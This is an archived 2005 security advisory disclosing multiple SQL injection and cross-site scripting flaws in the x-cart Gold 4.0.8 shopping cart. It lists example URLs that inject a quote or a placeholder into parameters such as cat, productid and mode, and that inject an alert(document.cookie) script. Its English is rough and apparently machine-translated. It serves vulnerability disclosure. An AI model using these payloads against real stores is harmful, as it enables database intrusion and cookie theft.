<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in x-cart Gold




SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Title: Multiple vulnerabilities in x-cart Gold 
            The program: x-cart Gold 
 The vulnerable version: 4.0.8 
               Homepage: www.x-cart.com 
 Vulnerability is found: 29.05.05 
              Has found: CENSORED / SVT / www.svt.nukleon.us 
===================================================================== 
The description. 
 
SQL - injections 
--------------- 
At research of a product the set Multiple vulnerabilities was revealed 
SQL-Injections. Vulnerability mentions practically all parameters. 
The first mistake has been found in parameter "cat". In a script 
There is no check of this parameter and at substitution of a symbol 
"'" Probably, to make SQL-an injection. Further the mistake has been 
found in Parameter "productid" as from - for absence of check on 
Special symbols, by transfer to this parameter of a symbol "'" occurs 
Mistake SQL, and script forwards automatically on page 
Speaking about a mistake. On this page the parameter "id" is visible to it 
We transfer a symbol "'" and as probably to make SQL - an injection. 
Further we look parameter "mode", at substitution Special symbols 
There is a mistake and probably to make SQL - an injection. We shall wound 
And parameter "section" in it it is possible to make SQL - an injection. 

XSS 
--------------- 
Vulnerability of type XSS can make in the same parameters as at mistakes 
SQL - injections 
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/home.php?printable='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?productid='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/error_message.php?access_denied&id='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/help.php?section='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/orders.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/register.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/search.php?mode='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcid='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcindex='>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
=====================================================================


The conclusion. 
^^^^^^^^^^^ 
Researches made only on version 4.0.8. Other versions as 
Can be vulnerable. The manufacturer in popularity is put. If is 
What that remarks write on censored@xxxxxxx 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
                                          ___
                                ___      /  /
                    ____________\__\___ /  /
                   |   _______________// _/_
               ____|__________   |\  \/ |   |
              /__________________| \____/   |
                                     ___|   |___
                                    |___     ___|
                                        |   |___
                                        |_______|